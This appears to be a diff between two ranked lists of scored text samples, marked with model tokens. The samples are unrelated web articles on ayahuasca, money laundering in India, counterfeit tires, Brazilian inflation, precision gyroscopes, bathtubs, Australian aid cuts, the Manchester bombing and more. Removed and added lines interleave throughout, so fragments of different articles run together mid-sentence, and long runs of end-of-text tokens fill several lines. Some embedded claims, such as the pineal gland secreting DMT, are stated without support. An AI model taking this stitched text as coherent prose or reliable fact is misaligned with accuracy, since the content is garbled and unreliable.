behavior. - -The principal ayahuasca compounds have a common indole structure which, through several mechanisms, influences certain functions of the central nervous system (CNS). The relevant factor is the biochemical similarity of these compounds to the neurotransmitter serotonin (5-HT). The harmala alkaloids in ayahuasca, primarily harmine and tetrahydroharmine, reversibly inhibit the neuronal enzyme monoamine oxidase (MAO). - -This allows DMT to be active when ingested orally. It also facilitates accumulation of biogenic amines, such as 5-HT, which are normally metabolized by monoamine oxidase enzymes. DMT is a naturally-occurring biochemical substance secreted by the human body in the pineal gland. It occurs in hundreds of plant species worldwide. It can produce very powerful visionary effects when smoked in its pure form or taken orally in Ayahuasca. - -The Ayahuasca Experience - -People who have consumed ayahuasca report having spiritual revelations regarding their purpose on earth, the true nature of the universe as well as deep insight into how to be the best person they possibly can. This is viewed by many as a spiritual awakening and what is often described as a rebirth. In addition it is often reported that individuals can gain access to higher spiritual dimensions and make contact with various spiritual or extra dimensional beings who can act as guides or healers. +Rank = 51; Score = 393216.0 +<|begin_of_text|>A gyro rotor | NASA -Wild cats including Jaguars looking for a high will seek out -================================================================================ -Rank = 47; Score = 778240.0 -<|begin_of_text|>CHENNAI: The Enforcement Directorate, which enforces the Prevention of Money Laundering Act (PMLA), has provisionally attached properties worth Rs 12,000 crore in the last 15 months, believed to be the proceeds of laundered money, data released by the government shows. This is more than what the department attached in the decade from 2005.In a written reply to an unstarred question on Friday, minister of state for finance Santosh Kumar Gangwar said that in the last one year, properties worth Rs 11,032.27 crore were attached by the ED after issuing 175 Provisional Attachment Orders (PAO). In comparison, the total value of assets attached from 2005-2015 was Rs 9003.26 crore, statistics on ED website show. In the first three months of the current financial year, Rs 965.84 crore has been attached. The total cumulative attachments would be around Rs 22,000 crore as of June 30 this year, said sources in the department. The figures of properties attached in 2016-17 zoomed due to the Vijay Mallya case, in which properties worth close to Rs 10,000 crore were attached, sources said.More than half of the total searches and a third of the total arrests by the department across the country were effected in the last 15 months, statistics show. Some of these highprofile cases and searches were in Tamil Nadu; for instance the Sekhar Reddy case and Madurai granite mining. The ED is an organisation which goes after big names accused of corruption. The PMLA is a stringent law, where the onus is on the accused to prove that the attached properties are bought from known sources of income, say sources. The ED has been given a free hand to dig up dirty money, said sources. This, they added, reflected in the figures.Sources in the department said that these measures were taken in coordination with other investigative agencies like Income Tax Investigation Wing and Central Bureau of Investigation (CBI). A task force on shell companies had been created by the ministry of corporate affairs which involves all these departments. The ED is tracking shell companies through which crores of rupees are transferred out of the country. In April, ED sleuths arrested in Chennai a 36-year-old man who had allegedly routed Rs 78 crore through six shell companies.As of July 12, 1.62 lakh shell companies had been struck off the Registrar of Companies (RoC). -================================================================================ -Rank = 48; Score = 774144.0 -<|begin_of_text|>Everyone knows that the “genuine designer handbag” going for $20 from a street vendor is neither genuine nor designer, and indeed may not even hold up as a bag. But when you go to a reputable retailer and spend what it costs to replace the tires on your car, you expect to get what the real goods. Alas, Consumer Reports has found: just because there’s a brand name you know on the outside of a tire, doesn’t mean you’re getting what you should be. +If you’ve ever tried to give yourself a haircut, you know just how hard it is to make something precisely symmetrical. We value symmetry so highly in part because it’s really hard to achieve. -Consumer Reports (our parent organization) discovered the counterfeit tires while conducting otherwise routine tire performance tests. One tire brand, American Pacific Industries’ Pegasus Advanta for SUVs, performed very poorly in the tests and received a low rating. +Here are five of the most symmetrical objects humans have ever crafted, and why they were so hard to make. -The company then contacted Consumer Reports to ask about the way the tires were tested and to ask which batch CR had used. +Strikingly symmetrical pieces of ear jewelry, alleged to be centuries old, have been seized on by conspiracy theorists. -That’s when the story gets interesting. It turned out that the tires being sold under API’s Pegasus brand were not what they appeared to be. The legally required date codes stamped into the tires indicated they had been made for API in a specific Chinese factory in August and December 2012. +Gravity Probe B quartz gyroscope rotors -To which API replied: “American Pacific Industries’ relationship with this factory ended in 2011 [and] our records indicate the last shipment of these tires in the SUV pattern was in December of 2011.” +In 2004, Gravity Probe B (GP-B) was launched into space on a Delta II rocket with the mission of testing the theory of general relativity. The Earth-orbiting satellite included a set of gyroscopes that could measure two of the phenomena predicted by general relativity: the curvature of spacetime (the geodetic effect) and the distortion of spacetime by large objects (frame-dragging). In order to measure these things, the gyroscopes had to be incredible accurate. Being off by anything larger than one one-hundred-billionth of a degree every hour would ruin the experiment. Standard gyroscopes used on submarines and military aircraft, for comparison, are over 10 million times less accurate. -Further, API said, the factory had been destroyed after that contract concluded, and many of their molds went missing. “We have no idea who may have made these tires nor what they put in them,” the company’s COO told Consumer Reports. +The key to building such an accurate gyroscope was creating perfectly symmetrical rotors, the quickly spinning elements that allow gyroscopes to maintain their orientation. These rotors had to be totally balanced, and completely homogenous inside as well. The GP-B team crafted these little spheres out of pure quartz blocks that were grown in Brazil and baked in Germany. The surface of each gyroscope is almost completely spherical, only about three ten-millionths of an inch away. -Counterfeit tires pose two big challenges for consumers. One is that their quality may be lacking — as these were — and consumers aren’t getting what they paid for. And the other challenge is that in the event of a safety defect or a recall, consumers don’t really have any recourse. +According to the Guinness Book of World Records, these are the roundest objects ever made. The Stanford team that worked on the spheres says only neutron stars are more spherical. -Ordinarily, if there is a safety complaint about tires the National Highway Traffic Safety Administration issues a recall and the manufacturer has to replace the item. But if the problem with the item is that the manufacturer did not in fact actually manufacture them… then who would be responsible for a recall? It’s not an action that NHTSA could actually take. +Avogadro Project silicon kilogram -But there are federal actions available. It turns out that counterfeited imported goods fall under the purview of Immigration and Customs Enforcement. An ICE official told Consumer Reports, that if counterfeit tires are being made and smuggled, “We would investigate and try to mount an interdiction and -================================================================================ -Rank = 49; Score = 774144.0 -<|begin_of_text|>SAO PAULO, Jan 26 (Reuters) - Economists raised sharply their forecasts for Brazil's 2015 inflation rate to a level further exceeding the official target, a weekly central bank poll showed on Monday. Inflation is expected to end 2015 at 6.99 percent, up from 6.67 percent in the prior week's survey and 6.53 percent a month ago, according to the median forecast of about 100 market economists. Brazil's government targets an inflation rate of 4.5 percent, with a tolerance margin of two percentage points. The median estimate for economic growth this year dropped to 0.13 percent from 0.38 percent in the previous week's survey and 0.55 percent a month earlier. (pct) 2015 2016 previous new previous new forecast forecast forecast forecast Consumer inflation 6.67 6.99 5.70 5.60 Exchange rate 2.80 2.80 2.85 2.90 (reais per U.S dollar, end-period) Interest rate 12.50 12.50 11.50 11.50 (end-period) GDP growth 0.38 0.13 1.80 1.54 Industrial output 0.71 0.69 2.65 2.50 (Reporting by Asher Levine; Editing by Toby Chopra)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Gravity Probe B’s only real contender, when it comes to perfect spheres, is the ball that should soon define a kilogram. This sphere is the result of The Avogadro Project, and its raw materials alone cost over a million dollars. The goal is to to supersede and replace the international prototype kilogram (IPK). The kilogram is the very last unit in the International System of Units (essentially, the metric system) that is still defined by a physical object—a cylinder made of platinum-iridium alloy—rather than physical principles. That cylinder currently sits under three nested bell jars in a climate-controlled vault just outside of ================================================================================ -Rank = 50; Score = 774144.0 -<|begin_of_text|>Private cast iron bathtubs with porcelain interiors on "claw foot" pedestals rose to popularity in the 19th century +Rank = 52; Score = 393216.0 +<|begin_of_text|>All funding for environment programs to end, as Coalition focuses aid on countries it needs to support its asylum policy -A bathtub, bath, or tub (informal) is a large or small container for holding water in which a person or animal may bathe. Most modern bathtubs are made of thermoformed acrylic, porcelain enameled steel, fiberglass-reinforced polyester, or porcelain enameled cast iron. A bathtub is usually placed in a bathroom either as a stand-alone fixture or in conjunction with a shower. +Aid groups are accusing the Coalition of breaking an election commitment after it revealed their funding would be cut mid-year as part of a $650m reduction in the former government’s budgeted foreign aid spending, leaving 2013-14 spending $107m below what was spent last year. -Modern bathtubs have overflow and waste drains and may have taps mounted on them. They are usually built-in, but may be free-standing or sometimes sunken. Until recently, most bathtubs were roughly rectangular in shape, but with the advent of acrylic thermoformed baths, more shapes are becoming available. Bathtubs are commonly white in colour, although many other colours can be found. The process for enamelling cast iron bathtubs was invented by the Scottish-born American David Dunbar Buick. +Foreign minister Julie Bishop announced the cuts for the groups as well as a complete defunding of international environmental programs. The government is redirecting a pared back aid budget towards the region and maintenance of spending on countries such as Papua New Guinea, Indonesia and Nauru, whose co-operation is necessary for the success of its asylum policy. -Two main styles of bathtub are common: +Organisations such as Care, Save the Children, Caritas, ChildFund, Plan International and the Fred Hollows Foundation – who have partnership agreements with the government – have had their current year funding cut by about 8%. -Western style bathtubs in which the bather lies down. These baths are typically shallow and long. +They say that means they are losing money already allocated to programs related to water and sanitation, elimination of violence against women, disaster reduction work and small-scale agriculture, among others. -Eastern style bathtubs in which the bather sits up. These are known as furo in Japan and are typically short and deep. +The organisations say the cuts clearly break a Coalition promise not to cut their funding when it announced a $4.5bn cut to the aid budget over the next four years two days before the federal election. -History of bathtubs and bathing [ edit ] +At the time of that cut, the then shadow treasurer, Joe Hockey, and shadow finance spokesman, Andrew Robb, said “the Coalition will reprioritise foreign aid allocations towards non-government organisations that deliver on-the-ground support for those most in need”. -Traditional bathtub (19th century) from Italy +“That will also mean putting more money into NGOs who are on the ground and who can deliver aid more efficiently than through AusAID or indeed through some of the multilaterals that we’ve been putting money into in increasing numbers because AusAID cannot handle the increases in the budget,” then foreign affairs spokeswoman Julie Bishop said. -Documented early plumbing systems for bathing go back as far as around 3300 BC with the discovery of copper water pipes beneath a palace in the Indus Valley Civilization of ancient India; see sanitation of the Indus Valley Civilization.[citation needed] Evidence of the earliest surviving personal sized bath tub was found on the Isle of Crete where a 1.5-metre (5 ft) long pedestal tub was found built from hardened pottery.[1] +The government said it needed to redirect the $4.5bn towards domestic infrastructure. The cut was from projected expenditure – with the aid budget continuing to grow in line with inflation. -The clawfoot tub, which reached the apex of its popularity in the late 19th century; had its origins in the mid 18th century, where the ball and claw design originated in Holland, possibly artistically inspired by the Chinese motif of a dragon holding a precious stone. The design spread to England where it found much popularity among the aristocracy, just as bathing was becoming increasingly fashionable. Early bathtubs in England tended to be made of cast iron, or even tin and copper with a face of paint applied that tended to peel with time. +“Under the previous Labor government, the rapid growth in Australia’s aid budget was neither targeted nor sustainable... This year’s aid expenditure will be $107m less than last year. From 2014-15 the $5bn aid budget will grow each year in line with the consumer price index,” Bishop said in a statement on Saturday, “confirming” the cuts after they were announced in the Australian newspaper. -The Scottish-born inventor David Buick invented a process for bonding porcelain enamel to cast iron in the +She said the government would now consult NGOs ================================================================================ -Rank = 51; Score = 761856.0 +Rank = 53; Score = 389120.0 <|begin_of_text|>Natural number 1,000,000,000 (one billion, short scale; one thousand million or milliard, yard,[1] long scale) is the natural number following 999,999,999 and preceding 1,000,000,001. One billion can also be written as b or bn.[2][3] @@ -1111,113 +1205,113 @@ minutes ago, the Roman Empire was flourishing and Christianity was emerging. (10 hours ago, modern human beings and their ancestors were living in the Stone Age (more precisely, the Middle Paleolithic). (10 hours ================================================================================ -Rank = 52; Score = 757760.0 -<|begin_of_text|>The balance of trade, commercial balance, or net exports (sometimes symbolized as NX), is the difference between the monetary value of a nation's exports and imports over a certain period.[1] Sometimes a distinction is made between a balance of trade for goods versus one for services. The balance of trade measures a flow of exports and imports over a given period of time. The notion of the balance of trade does not mean that exports and imports are "in balance" with each other. +Rank = 54; Score = 385024.0 +<|begin_of_text|>THE United States cut its energy-related carbon dioxide pollution by 3.8 per cent last year, the second biggest drop since 1990, the Department of Energy says. -If a country exports a greater value than it imports, it has a trade surplus or positive trade balance, and conversely, if a country imports a greater value than it exports, it has a trade deficit or negative trade balance. As of 2016, about 60 out of 200 countries have a trade surplus. The notion that bilateral trade deficits are bad in and of themselves is overwhelmingly rejected by trade experts and economists.[2][3][4][5][6] +The only recent year with a bigger percentage drop was in 2009, when America was in a large recession. -Explanation [ edit ] +American cars and factories spewed 5.83 billion tonnes of carbon dioxide in 2012, down from 6.06 billion in 2011. It is the lowest level for US emissions since 1994. Carbon dioxide is the chief man-made global warming gas. -Balance of trade in goods and services (Eurozone countries) +Energy Department economist Perry Lindstrom said on MOnday that carbon pollution reduction was due to warm winter weather, more efficient cars because of new mileage requirements and an ongoing shift from coal power to natural gas to produce electricity. -US trade balance from 1960 +The coal shift is a big factor as is a sluggish economic recovery, said Jay Apt, director of the Carnegie Mellon Electricity Industry Centre. He said that in 1994 coal provided 52 per cent of the US power and now it was down to 37 per cent. Burning coal produces far more carbon dioxide than burning natural gas. -U.S. trade balance and trade policy (1895–2015) +Some past cuts in carbon pollution were mostly due to economic factors, such as the 7.1 per cent drop in 2009, Lindstrom said. -U.S. trade deficit (in billions, goods and services) by country in 2017 +But this drop happened while the US economy was growing 2.8 per cent, as reflected by the gross domestic product, and its energy use was dropping by more than 2 per cent. -U.K. balance of trade in goods (since 1870) +Economists measure energy efficiency and how real reductions are in carbon pollution, by calculating carbon dioxide emissions per unit of GDP. And from 2011 to 2012, the United States carbon pollution per GDP dropped by a record 6.5 per cent, Lindstrom said. -The balance of trade forms part of the current account, which includes other transactions such as income from the net international investment position as well as international aid. If the current account is in surplus, the country's net international asset position increases correspondingly. Equally, a deficit decreases the net international asset position. +That shows this drop was clearly not due to a recession, Lindstrom said. -The trade balance is identical to the difference between a country's output and its domestic demand (the difference between what goods a country produces and how many goods it buys from abroad; this does not include money re-spent on foreign stock, nor does it factor in the concept of importing goods to produce for the domestic market). +"This latest drop in energy-related carbon emissions is reason for cautious optimism that we're already starting to move in the right direction," said Pennsylvania State University climate scientist Michael Mann. -Measuring the balance of trade can be problematic because of problems with recording and collecting data. As an illustration of this problem, when official data for all the world's countries are added up, exports exceed imports by almost 1%; it appears the world is running a positive balance of trade with itself. This cannot be true, because all transactions involve an equal credit or debit in the account of each nation. The discrepancy is widely believed to be explained by transactions intended to launder money or evade taxes, smuggling and other visibility problems. Especially for developing countries, the transaction statistics are likely to be inaccurate. +"But this alone will not lead us toward the dramatic carbon reductions necessary to avoid dangerous climate change." -Factors +The world is heading in the opposite direction. In 2011, the world carbon dioxide emissions jumped 3 per cent, because of a large increase by China, the number one carbon polluting country. The US is number two in carbon emissions.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 53; Score = 753664.0 -<|begin_of_text|>U.S. may face deflation, a problem Japan understands too well +Rank = 55; Score = 385024.0 +<|begin_of_text|>Fresh Christmas trees are a holiday tradition, loved for their beauty and fresh, outdoorsy fragrance. However, Christmas trees often take the blame for destructive fires that occur during the holiday season. The most effective way to prevent Christmas tree fires is to keep the tree well hydrated. With proper care, a tree should remain fresh for two to three weeks. This may sound easy, but it becomes a problem if your Christmas tree is not drinking water. -Economists worry that America could be edging closer to the trap that cost the other nation more than a decade of growth. +Causes for a Christmas Tree Not Taking Up Water -But soon, lower prices cut into business profits, and managers begin to trim payrolls. That in turn undermines consumers' buying power, leading to more pressure on profits, jobs and wages — as well as cutbacks in expansion and in the purchase of new plants and equipment. +Generally, when Christmas trees have problems taking up water, it’s because we tend to add products to the tree itself or the water. Avoid spray-on fire retardants and other products advertised to keep your tree fresh. Similarly, bleach, vodka, aspirin, sugar, lime soda, copper pennies or vodka have little or no effect and some can actually slow water retention and increase moisture loss. -When deflation begins, prices fall. At first that seems like a good thing. +What works best? Plain old tap water. If you tend to be forgetful, keep a pitcher or watering can near the tree to remind you. -And as Tokyo's experience suggests, deflation can be at least as tough a problem as the soaring prices of inflation or the financial pain of a traditional recession. +How to Get a Christmas Tree to Take Up Water -But increasingly, economists and other analysts are expressing concern that the United States could be edging closer to a different problem — the kind of deflationary trap that cost Japan more than a decade of growth and economic progress. +Cutting a thin sliver from the bottom of the trunk is key to keeping a tree fresh. Keep in mind that if the tree is freshly cut, you don’t need to cut the trunk. However, if the tree has been cut for longer than 12 hours before you put it in water, you must trim ¼ to ½ inch from the bottom of the trunk. -Reporting from Washington — The White House prediction Friday that the deficit would hit a record $1.47 trillion this year poured new fuel on the fiery argument over whether the government should begin cutting back to avoid future inflation or instead keep stimulating the economy to help the still-sputtering recovery. +This is because the bottom of the trunk seals itself with sap after a few hours and can’t absorb water. Cut straight across and not at an angle; an angular cut makes it harder for the tree to take up water. It is also difficult to get a tree with an angular cut to stand upright. Also, don’t drill a hole in the trunk. It doesn’t help. -Also, consumers who are financially able to buy often wait for still lower prices, adding to the deflationary trend. +Next, a large stand is critical; a Christmas tree can drink up to one quart of water for each inch of stem diameter. The National Christmas Tree Association recommends a stand with a one-gallon capacity. Never trim the bark to accommodate a too-tight stand. The bark helps the tree take up water. -All these factors feed on one another, setting off a downward spiral that can be as hard to escape from as a stall in an airplane. +Christmas Tree Watering Tips -For now, the dominant theme of the nation's economic policy debate remains centered on the comparative dangers of deficits and inflation. However, economists across the political spectrum — here and abroad — are talking more often about the potential for deflation. +Start with a fresh Christmas tree. There’s no way to hydrate a dried up tree, even if you trim the bottom. If you aren’t sure about freshness, pull a branch slowly through your fingers. A few dry needles are no reason for concern, but look for a fresher tree if a large number of needles are loose or brittle. -So how likely is the problem? -The latest U.S. data are sobering: Consumer prices overall have declined in each of the last three months, putting the inflation index in June just 1.1% above a year earlier. The core inflation rate — a better gauge of where prices are going because it excludes volatile energy and food items — has dropped to a 44-year low of 0.9%. +================================================================================ +Rank = 56; Score = 382976.0 +<|begin_of_text|>"California is once again the sixth-largest economy in the world. If you add the GDP’s of Washington and Oregon, California would surpass the United Kingdom to become the fifth-largest economy in the world." -That's well below the 1.5%-to-2% year-over-year inflation that the Federal Reserve likes to see, and some Fed policymakers have raised concerns about the rising risk of a broad decline in prices. +Antonio Villaraigosa, the former mayor of Los Angeles and 2018 Democratic candidate for California governor, recently called for the state to unite with like-minded cities and states on the West Coast to oppose "dangerous policies advanced by a Trump administration." -Private economists and financial experts have expressed much greater concern. +California’s large economy, Villaraigosa said in a Dec. 8, 2016 op-ed in the Sacramento Bee, gives it leverage in any possible showdown. -"I think we have to take it seriously," said John Mauldin, president of Millennium Wave Advisors in Dallas, who puts the probability of def -================================================================================ -Rank = 54; Score = 745472.0 -<|begin_of_text|>BRITISH PRIME MINISTER Theresa May has raised the country’s terror threat level from severe to critical. +In making this call, Villaraigosa repeated a favorite claim by California politicians that the state’s economy ranks as the sixth largest in the world -- a claim PolitiFact California rated Mostly True in July. He then took the economic comparison further -- all the way to the Pacific Northwest. -Critical is the highest level possible in the UK and means that an attack is “expected imminently”. +"California is once again the sixth-largest economy in the world," Villaraigosa said. "If you add the GDP’s of Washington and Oregon, California would surpass the United Kingdom to become the fifth-largest economy in the world." -The threat level is decided by the Joint Terrorism Analysis Centre (JTAC). The last time it reached critical was in 2007, having been severe since 2014. +"That’s power – power we must use to protect our people against any dangerous policies advanced by a Trump administration," he added. -Prime Minister Theresa May said that the decision had been made following investigations today. +We decided to fact-check the part of Villaraigosa’s claim that if the GDPs of California, Washington and Oregon were somehow combined, they’d represent the fifth largest economy on the planet, ahead of the United Kingdom. -“It has now been concluded that the threat levels should be increased for the time being. +Gross domestic product, or GDP, is used to measure the health of a country’s or state’s economy. It’s the total value of all goods and services. -“This means that [the JTAC's] assessment is not only that an attack is highly likely, but that another attack is imminent +Our research -“It is a possibility we cannot ignore that there is a wider group of individuals linked to this attack.” +A campaign spokeswoman for Villaraigosa pointed us to 2015 GDP figures from the International Monetary Fund. -May added that military personnel will be deployed to Britain’s streets to support armed police officers under Operation Tempora. +We used the same data in July to verify that California, with a GDP of nearly $2.5 trillion, had the sixth-largest economy behind the United States, China, Japan, Germany and the United Kingdom. -Armed personnel will be visible at big events such as concerts and sporting events, she said. +California Gov. Jerry Brown’s administration released GDP figures in June showing the state had jumped two spots in these unique world rankings ahead of France and Brazil and into sixth place behind the United Kingdom. -Attack +In our July fact check, we noted that when adjusted for California’s very high cost of living, the state’s GDP drops several places. This led us to our Mostly True rating for the claim, which we define as "accurate but needs clarification or additional information." -Source: PA Wire/PA Images +To come up with a combined GDP for three West Coast states, we +================================================================================ +Rank = 57; Score = 378880.0 +<|begin_of_text|>"You must be the only person worried about inflation, Liam". So I was told on Newsnight last week – by someone who's spent four of the last five years in the cabinet. -The move comes as 22 people were confirmed dead after last night’s suicide bomb attack on an Ariana Grande concert in Manchester. +Almost lost for words, I blurted an answer before Mr Paxman intervened. -Manchester police identified the suspect behind the attack as 22-year-old Salman Abedi. +But I left the television studio shocked that the former minister, someone of genuine ability, could be so ignorant of life beyond the Westminster village. -Police staged an armed raid on a Manchester address believed to be where Abedi lived, carrying out a controlled explosion to gain entry after arresting a 23-year-old man earlier Tuesday in connection with the attack. +"Inflation, not deflation" is a recurrent theme of this column. That's because the Western world's response to the "credit crunch", this orgy of wildly expansive policy using "deflation is nigh" as an alibi, amounts to a repeated whacking of the self-destruct button. -“A single terrorist detonated his improvised explosive device near one of the exits of the venue, deliberately choosing the time and place to cause maximum carnage and to kill and injure indiscriminately,” May said after an emergency ministerial meeting. +Almost everyone outside the "political and media elite" knows this. Amidst "deflation is upon us" warnings from this elite, UK CPI inflation went up last month – to 3.2pc. CPI understates true inflation. But even CPI is above the Bank of England's target – and has been for 17 months. -The attack was the deadliest in Britain since July 7, 2005 when four suicide bombers inspired by Al-Qaeda attacked London’s transport system during rush hour, killing 52 people and wounding 700 more. +So if I'm the only one worried, why is Mervyn King writing repeated letters acknowledging inflation is too high? -The Islamic State group has claimed responsibility for the attack.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 55; Score = 745472.0 -<|begin_of_text|>Low rolling resistance tires are designed to reduce the energy loss as a tire rolls, decreasing the required rolling effort — and in the case of automotive applications, improving vehicle fuel efficiency. Approximately 5–15% of the fuel consumed by a typical car may be used to overcome rolling resistance.[1] A 2003 California Energy Commission (CEC) preliminary study estimated that adoption of low-rolling resistance tires could save 1.5–4.5% of all gasoline consumption, but that current data were also insufficient to compare safety and other characteristics.[2] +Sterling is down a third in 18 months. Import prices are soaring. The UK's monetary base is doubling. -A United States National Highway Traffic Safety Administration (NHTSA) study in 2009 found that if 2% of the replacement tires would reduce their rolling resistance by 5%, there would be 7.9 million gallons fuel and 76,000 metric tons of CO2 saved annually. +"Broad" M4 money is expanding at 16pc a year. Food price inflation is 8pc, with double-digit producer price inflation too – as the credit crunch destroys supply chains. -(SAE J1269 and SAE J2452) performed on new tires. +Warren Buffett, the most successful living investor, foresees an "inflation onslaught". Peter Brabeck, the Nestlé chairman and one of the world's top businessmen, says "Now the printing machine is starting, this is the start of inflation." -Measuring rolling resistance in tires [ edit ] +China and other major creditors are rightly concerned Western governments – particularly the US and UK – want to inflate away their sovereign debts. -Rolling resistance can be expressed by the rolling resistance coefficient (RRC or C rr ), which is the value of the rolling resistance force divided by the wheel load. A lower coefficient means the tires will use less energy to travel a certain distance. The coefficient is mostly considered as independent of speed, but for precise calculations it is tabled at several speeds or an additional speed-dependent part is used. The Society of Automotive Engineers (SAE) has developed test practices to measure the RRC of tires. These tests (SAE J1269 and SAE J2452) are usually performed on new tires. +That's why the "bond vigilantes" are stirring and we could very soon face a gilts strike. -When measured by using these standard test practices, most new passenger tires have reported RRCs ranging from 0.007 to 0.014.[3] In the case of bicycle tires, values of 0.0025 to 0.005 are achieved.[4] These coefficients are measured on rollers, with power meters on road surfaces, or with coast-down tests. In the latter two cases, the effect of air resistance must be subtracted or the tests performed at very low speeds. In 2009 The CEC used a rating called Rolling Resistance Force RRF. RRF and RRC, rolling resistance coefficient are very similar. Difference is taking the RRF and dividing it by the load(weight) to get RRC. So a Michelin Harmony tire rated at 9.45 RRF at 1000 pounds load would be.0095 RRC.[5][6] +If I'm the only one worried about inflation, why is the price of gold so high, with the price of commodities also up sharply – even though the global demand outlook is weak? -In Canada, Transport Canada tests will be conducted +If I'm the only one worried about inflation, why does the latest report of the Bank of England's pension scheme show it recently changed it allocation of index-linked instruments – the ultimate anti-inflation hedge – from 25pc to more than 70pc of its portfolio? + +Am I the only one worried? I so wish that was true. We face an inflation tsunami. And ================================================================================ -Rank = 56; Score = 745472.0 +Rank = 58; Score = 376832.0 <|begin_of_text|>(Updates with link to most and least expensive cities to live in the U.S.) For the first time, the Commerce Department’s Bureau of Economic Analysis released price-adjusted estimates of personal income for states and metropolitan areas for 2008 to 2012, 